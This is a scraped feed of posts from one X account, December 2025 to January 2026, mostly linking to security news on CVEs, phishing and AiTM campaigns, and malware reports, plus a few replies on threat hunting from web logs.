"WordFence CVE-2025-8489 in King Addons for Elementor for WordPress. All versions let unauth attackers create admin accounts due to improper privilege controls (CWE-269). Disable plugin monitor registrations and enforce MFA -- https://www.wordfence.com/blog/2025/12/attackers-actively-exploiting-critical-vulnerability-in-king-addons-for-elementor-plugin https://www.wordfence.com/blog/2025/12/attackers-actively-exploiting-critical-vulnerability-in-king-addons-for-elementor-plugin"  
[X Link](https://x.com/AndreGironda/status/1996233925270622375)  2025-12-03T15:03Z [----] followers, [---] engagements


"Social engineering attacks utilizing Microsoft Teams' new Chat-with-Anyone feature has been uncovered. Threat actors impersonated IT support to trick users into initiating Quick Assist sessions ultimately leading to cred theft & exfiltration -- https://www.trendmicro.com/en_us/research/25/l/valleyrat-campaign.html https://www.trendmicro.com/en_us/research/25/l/valleyrat-campaign.html"  
[X Link](https://x.com/AndreGironda/status/1996236855382262031)  2025-12-03T15:15Z [----] followers, [---] engagements


"Chinas new two-front strategy against Japan and Taiwan -- https://thediplomat.com/2025/12/chinas-new-two-front-strategy-against-japan-and-taiwan/ https://thediplomat.com/2025/12/chinas-new-two-front-strategy-against-japan-and-taiwan/"  
[X Link](https://x.com/AndreGironda/status/1996638849179779406)  2025-12-04T17:52Z [----] followers, [---] engagements


"The VS Code malware that captures your screen -- https://www.koi.ai/blog/the-vs-code-malware-that-captures-your-screen https://www.koi.ai/blog/the-vs-code-malware-that-captures-your-screen"  
[X Link](https://x.com/AndreGironda/status/1998053946531926485)  2025-12-08T15:35Z [----] followers, [---] engagements


"DataDog Investigating an adversary-in-the-middle phishing campaign targeting Microsoft [---] and Okta users -- https://securitylabs.datadoghq.com/articles/investigating-an-aitm-phishing-campaign-m365-okta https://securitylabs.datadoghq.com/articles/investigating-an-aitm-phishing-campaign-m365-okta"  
[X Link](https://x.com/AndreGironda/status/1998755034813837747)  2025-12-10T14:01Z [----] followers, [---] engagements


"The ChimeraWire trojan boosts website popularity by skillfully pretending to be human -- https://news.drweb.com/show/i=15090&lng=en&c=5 https://news.drweb.com/show/i=15090&lng=en&c=5"  
[X Link](https://x.com/AndreGironda/status/1998755612084359618)  2025-12-10T14:04Z [----] followers, [---] engagements


"AiTM campaign that bypasses MFA targeting Microsoft [---] and Okta users -- https://cybersecuritynews.com/new-aitm-attack-campaign https://cybersecuritynews.com/new-aitm-attack-campaign"  
[X Link](https://x.com/AndreGironda/status/1999497296720048510)  2025-12-12T15:11Z [----] followers, [---] engagements


"@chrissanders88 Use Apache logs and other telemetry to trace the IPv4/IPv6 origins of the overall unwanted activities check world-wide honeypot data to determine if those indicators are global scans or perhaps specific to the target environs and then track JA4+ http paths ports and CVEs"  
[X Link](https://x.com/AndreGironda/status/2000948472602878461)  2025-12-16T15:17Z [----] followers, [---] engagements


"@chrissanders88 The developers devops teams and others can aid in verifying that the Apache server(s) support PHP or not. Maybe it's been turned on by a threat actor or accidentally by admin pilot error. If they don't then look for other sources and web-layer attack types"  
[X Link](https://x.com/AndreGironda/status/2000949215879704888)  2025-12-16T15:20Z [----] followers, [--] engagements


"@banthisguy9349 Uploaded my VTI api key to VT"  
[X Link](https://x.com/AndreGironda/status/2001349084809207839)  2025-12-17T17:49Z [----] followers, [---] engagements


"VPN browser extensions caught spying on users' AI chats -- https://moonlock.com/chrome-extension-spying-ai-chats https://moonlock.com/chrome-extension-spying-ai-chats"  
[X Link](https://x.com/AndreGironda/status/2002030036220809642)  2025-12-19T14:55Z [----] followers, [---] engagements


"HubSpot users targeted with phishing -- https://cybersecuritynews.com/hackers-targeting-hubspot-users https://cybersecuritynews.com/hackers-targeting-hubspot-users"  
[X Link](https://x.com/AndreGironda/status/2002030437452181640)  2025-12-19T14:57Z [----] followers, [---] engagements


"CVE-2025-68615 Net-SNMP SnmpTrapd Agent Message Stack-based Buffer Overflow Remote Code Execution Vulnerability -- http://www.zerodayinitiative.com/advisories/ZDI-25-1181 http://www.zerodayinitiative.com/advisories/ZDI-25-1181"  
[X Link](https://x.com/AndreGironda/status/2003847451766296722)  2025-12-24T15:17Z [----] followers, [---] engagements


"CVE-2025-13773 Print Invoice & Delivery Notes for WooCommerce plugin for WordPress = 5.8.0 - Unauthenticated Remote Code Execution -- https://vulnerability.circl.lu/vuln/CVE-2025-13773 https://vulnerability.circl.lu/vuln/CVE-2025-13773"  
[X Link](https://x.com/AndreGironda/status/2003848304644501789)  2025-12-24T15:20Z [----] followers, [---] engagements


"CVE-2025-68664 LangChain Serialization Injection in dumps() and load() -- https://www.upwind.io/feed/cve-2025-68664-langchain-serialization-injection https://www.upwind.io/feed/cve-2025-68664-langchain-serialization-injection"  
[X Link](https://x.com/AndreGironda/status/2003848504301805743)  2025-12-24T15:21Z [----] followers, [---] engagements


"Forcepoint [----] holiday scams Docusign phishing meets loan spam -- https://www.forcepoint.com/blog/x-labs/docusign-phishing-holiday-loan-spam https://www.forcepoint.com/blog/x-labs/docusign-phishing-holiday-loan-spam"  
[X Link](https://x.com/AndreGironda/status/2003857687185100858)  2025-12-24T15:57Z [----] followers, [---] engagements


"Phishing reverse engineering JavaScript and evasion techniques -- https://medium.com/@ashishbogati098/inside-a-phishing-attack-reverse-engineering-javascript-and-evasion-techniques-4cfb34ec30eb https://medium.com/@ashishbogati098/inside-a-phishing-attack-reverse-engineering-javascript-and-evasion-techniques-4cfb34ec30eb"  
[X Link](https://x.com/AndreGironda/status/2004182617361731641)  2025-12-25T13:29Z [----] followers, 24.5K engagements


"CVE-2025-68664 LangChain serialization injection vulnerability enables secret extraction in dumps/loads APIs -- https://github.com/langchain-ai/langchain/security/advisories/GHSA-c67j-w6g6-q2cm https://github.com/langchain-ai/langchain/security/advisories/GHSA-c67j-w6g6-q2cm"  
[X Link](https://x.com/AndreGironda/status/2004356860800102865)  2025-12-26T01:01Z [----] followers, [---] engagements


"CVE-2025-14728 Velociraptor directory traversal -- https://docs.velociraptor.app/announcements/advisories/cve-2025-14728/ https://docs.velociraptor.app/announcements/advisories/cve-2025-14728/"  
[X Link](https://x.com/AndreGironda/status/2005682773374505387)  2025-12-29T16:50Z [----] followers, [---] engagements


"Koi GlassWorm fresh infrastructure new tricks the pivot from Windows to macOS in Wave [--] -- https://www.koi.ai/blog/glassworm-goes-mac-fresh-infrastructure-new-tricks https://www.koi.ai/blog/glassworm-goes-mac-fresh-infrastructure-new-tricks"  
[X Link](https://x.com/AndreGironda/status/2005811107387334905)  2025-12-30T01:20Z [----] followers, [----] engagements


"Tracing the AsyncRAT C2 infrastructure (Xoilac campaign) -- https://medium.com/@fernandaycesarmauricioymariel/threat-hunting-diary-trazando-la-infraestructura-c2-de-asyncrat-campaa-xoilac-0ee441baedab https://medium.com/@fernandaycesarmauricioymariel/threat-hunting-diary-trazando-la-infraestructura-c2-de-asyncrat-campaa-xoilac-0ee441baedab"  
[X Link](https://x.com/AndreGironda/status/2006085155472171090)  2025-12-30T19:29Z [----] followers, [----] engagements


"@greglesnewich @ollieatnowhere Using LLMs is like taking a hammer out the toolbox hovering it over the target object aiming recalibrating if necessary and striking down over-and over until we get tired or the object(s) materialize in the way we nearly (but maybe not neatly) imagined they might. Scaffolding"  
[X Link](https://x.com/AndreGironda/status/2006758573825733020)  2026-01-01T16:05Z [----] followers, [--] engagements

Limited data mode. Full metrics available with subscription: lunarcrush.com/pricing